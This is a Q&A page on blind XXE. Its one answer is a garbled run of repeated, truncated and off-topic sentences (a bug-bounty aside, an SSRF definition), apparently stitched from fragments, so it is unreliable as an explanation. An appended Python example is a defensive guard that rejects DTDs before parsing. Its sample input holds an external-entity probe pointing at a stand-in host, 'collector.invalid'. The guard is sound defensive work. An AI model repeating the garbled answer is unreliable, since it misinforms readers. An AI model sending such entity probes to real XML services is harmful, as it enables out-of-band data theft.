What is blind xxe?


Question: What is blind xxe?

Topics: xxe


Available Answers: 1


Answer #1

18


What is blind XXE? Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. In the case of out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application. On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. SSRF is basically a type of attack whereby an attacker can send a specially crafted request to an app in order to trigger a server side action. Blind XXE vulnerabilities arise when the application is vulnerable to XXE but doesn't return the value of any defined external entities within its. Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external.


Answered By:
Hiya

Hyderabad, India
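
Because a blind XXE leaves nothing in the response to inspect, the dependable control is to refuse DTDs before the document reaches application code. The following is an added example, not part of the answer above: a pre-parse guard built on Python's standard `xml.parsers.expat`, where the function names and both sample documents are constructed for illustration.

```python
from xml.parsers import expat


class DTDRejected(ValueError):
    """Untrusted XML carried a DOCTYPE or entity declarations."""


def dtd_findings(xml_bytes):
    """Return (kind, name, system_id) for every DTD construct in the document."""
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is None:
            kind = "internal-entity"
        elif is_param:
            kind = "external-parameter-entity"
        else:
            kind = "external-entity"
        findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is installed, so expat records the
    # declarations but never fetches the resources they point at.
    parser.Parse(xml_bytes, True)
    return findings


def require_no_dtd(xml_bytes):
    """Pass the bytes through only if no DTD construct is present."""
    findings = dtd_findings(xml_bytes)
    if findings:
        raise DTDRejected(findings)  # log the findings; they name the callback host
    return xml_bytes


# Constructed sample inputs (hypothetical host under the reserved .invalid TLD).
SAMPLE_CLEAN = b"<order><id>1</id></order>"
SAMPLE_WITH_DTD = (
    b'<!DOCTYPE order [\n'
    b'  <!ENTITY % ext SYSTEM "http://collector.invalid/probe.dtd">\n'
    b']>\n'
    b'<order><id>1</id></order>'
)
```

The rejected document would look identical to a clean one from the response alone, which is why the check runs on the declarations rather than on the output.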
